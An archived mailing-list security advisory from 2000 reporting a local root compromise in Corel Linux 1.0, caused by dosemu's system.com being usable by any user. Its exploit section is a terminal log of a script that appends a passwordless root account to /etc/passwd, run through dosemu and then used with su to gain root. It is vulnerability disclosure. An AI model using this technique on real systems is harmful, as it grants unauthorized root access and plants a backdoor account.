Corel Linux 1.0 dosemu default configuration: Local root vuln

From: suidat_private
Date: Wed Dec 31 1969 - 15:59:59 PST

  • Next message: David Nesting: "Re: "Association of Responsible Internet Providers"?" 

    Re all,

Hadn't seen this one around yet, has been on my site for about a week now.

Corel's mailserver bounced me about this IIRC? Whats up Corel?

Cheers.

----------------------------

suidat_private - Corel Linux dosemu config error. Local root compromise.

Software: 	Corel Linux 1.0 dosemu distribution configuration
URL:		http://linux.corel.com
Version:	Version 1.0
Platforms:	Corel Linux only.
Type:	 	Default misconfiguration. Noone reads README anymore??

Summary:

	Local users can take advantage of a packaging and configuration
	error (which has been known and documented for a long time) to
	execute arbitrary commands as root.

	We see from the doc/README/SECURITY file as well as
	http://www.dosemu.org/docs/README/0.98/README-3.html
	written in 1997 that this configuration is bad.

Vulnerability:

	The system.com command is available to any user who runs the
	dos emulator. This is a direct violation of the advice from
	the SECURITY readme file:

		Never allow the 'system.com' command (part of dosemu)
		to be executed. It makes dosemu
                execute the libc 'system() function'. Though privileges
		are turned off, the process inherits the
                switched uid-setting (uid=root, euid=user), hence the
		unix process can use setreuid to gain root
                access back. ... the rest you can imagine your self.

Exploit:

	This is a script log which details how to reproduce this:

	
		Script started on Fri Feb 25 13:54:00 2000
		nebula:~$ id
		uid=1000(suid) gid=1000(suid) groups=1000(suid)
		nebula:~$ cat > hack-corel
		#!/bin/bash
		echo "owned::0:0::/:/bin/bash" >> /etc/passwd
		^D
		nebula:~$ chmod a+rx hack-corel
		nebula:~$ export PATH="$PATH:."
		nebula:~$ dos
		CPU speed set to 430/1 MHz
		Running on CPU=586, FPU=1, rdtsc=1

			[ snip bunch of dosemu crap ]

		"Welcome to dosemu 0.98!
		C:\> system hack-corel;
		sh: : command not found
		C:\> exitERROR: general protection at 0x3f0ff: 0
		ERROR: SIGSEGV, protected insn...exiting!

		nebula:~$ tail -1 /etc/passwd
		owned::0:0::/:/bin/bash
		nebula:~$ su owned
		nebula:/home/suid# id
		uid=0(root) gid=0(root) groups=0(root)
		nebula:/home/suid# exit
		exit
		nebula:~$ exit

		Script done on Fri Feb 25 13:55:27 2000

Note:
	This is not a vulnerability in dosemu itself. The documentation
	warns users very specifically that this will happen if the system
	is configured as such.

Greets:

	duke
	cr
	active

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:45 PDT